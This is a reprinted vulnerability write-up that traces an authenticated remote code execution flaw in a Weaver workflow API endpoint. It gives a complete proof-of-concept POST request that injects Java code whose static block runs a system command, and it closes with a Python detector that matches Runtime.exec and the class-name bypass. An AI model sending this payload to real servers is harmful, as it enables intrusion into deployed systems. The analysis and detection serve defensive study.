
Title: A micro-1day backend RCE audit vulnerability


A certain application has a backend RCE. Following the relevant information, during the backend audit we found a call that instantiates a class via newInstance.


Tracing back to the source leads to InterfaceRegisterCustomOperationCmd#execute.

The access path is /api/integration/workflowflow/getInterfaceRegisterCustomOperation

getInterfaceRegisterCustomOperation calls execute, which first checks the user, so this is an authenticated backend vulnerability.


Because we need to reach the sink function JavaCodeToObject, we must satisfy the if condition and control var18 and var20.


Here var14 needs to be "add".


The value of var14 is taken from the request parameter method; since the POST method was specified earlier, the parameter here is method=add.


After entering the if branch, the method returns immediately if var15 is empty, so actionid must not be empty. Combined with the condition above: method=add&actionid=1


If var18 does not start with weaver.interfaces.workflow.action.javacode.Action, execution enters the following branch and an exception is thrown, which defeats the purpose. So classname=weaver.interfaces.workflow.action.javacode.Action; combined with the parameters above: method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action


The var20 value below is taken from the javacode parameter; combined with the payload above: method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action&javacode=


If var18 contains weaver.interfaces.workflow.action.javacode, execution enters the JavaCodeToObject call we want, so the two names are joined together: classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action. Otherwise a class-loading exception is reported.


With the conditions above, var18 and var20 are both satisfied. The var20 parameter is constructed as:

javacode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class test { static { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { e.printStackTrace(); } } }

The command to run is placed in a static initializer block because static code is executed automatically when the class is instantiated, which is how command execution is achieved.


It seems the actual request was not successful. Looking back at the code, I found that a parameter was missing: dtinfo_CustomParameterData

POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 548

method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Test&dtinfo_CustomParameterData=11&javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode;
import java.io.IOException;
public class Test {
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
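Defender-side detection for the request pattern walked through above, as an added example written in Python (not code from the original post or from the Weaver product). The endpoint path, parameter names and the weak startsWith/contains class-name checks come from the write-up; the sample requests are constructed, and ProcessBuilder is an extra marker that is my own assumption.

```python
import re
from urllib.parse import parse_qs, urlencode

ENDPOINT = "/api/integration/workflowflow/getInterfaceRegisterCustomOperation"
PKG = "weaver.interfaces.workflow.action.javacode"
# A legitimate class name is the package plus exactly one identifier. The weak
# startsWith/contains checks also accept PKG.Action.PKG.<name>; this pattern does not.
LEGIT_CLASSNAME = re.compile(r"^" + re.escape(PKG) + r"\.[A-Za-z_$][\w$]*$")
# Source markers: a static initializer runs as soon as newInstance loads the class,
# Runtime.exec is the sink in the PoC; ProcessBuilder is an added assumption.
CODE_MARKERS = [r"static\s*\{", r"Runtime\.getRuntime\(\)\.exec\s*\(", r"ProcessBuilder"]

def analyze_request(method, path, body):
    """Return the findings for one request; an empty list means not flagged."""
    findings = []
    if method.upper() != "POST" or path != ENDPOINT:
        return findings
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("method") != "add":
        return findings
    classname = params.get("classname", "")
    if classname and not LEGIT_CLASSNAME.match(classname):
        findings.append("classname is not the package plus one identifier: " + classname)
    if classname.count(PKG) > 1:
        findings.append("classname repeats the javacode package (nested-name bypass)")
    code = params.get("javaCode") or params.get("javacode") or ""
    for marker in CODE_MARKERS:
        if re.search(marker, code):
            findings.append("javaCode matches " + marker)
    return findings

# Constructed sample traffic (not captured from any real system).
SAMPLE_REQUESTS = [
    ("POST", ENDPOINT, urlencode({
        "method": "add", "actionid": "1",
        "classname": PKG + ".Action." + PKG + ".Test",
        "dtinfo_CustomParameterData": "11",
        "javaCode": "package " + PKG + ".Action." + PKG + "; public class Test {"
                    ' static { Runtime.getRuntime().exec("calc.exe"); } }',
    })),
    ("POST", ENDPOINT, "method=add&actionid=2&classname=" + PKG + ".Action"),
    ("GET", ENDPOINT, "method=add"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Map the index of each flagged request to its findings."""
    results = ((i, analyze_request(*req)) for i, req in enumerate(requests))
    return {i: hits for i, hits in results if hits}
```

Only the first constructed request is flagged: its class name repeats the package and its javaCode carries a static block calling Runtime.exec, while a plain registration of the Action class produces no findings.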


Reprinted from: https://xz.aliyun.com/t/11947
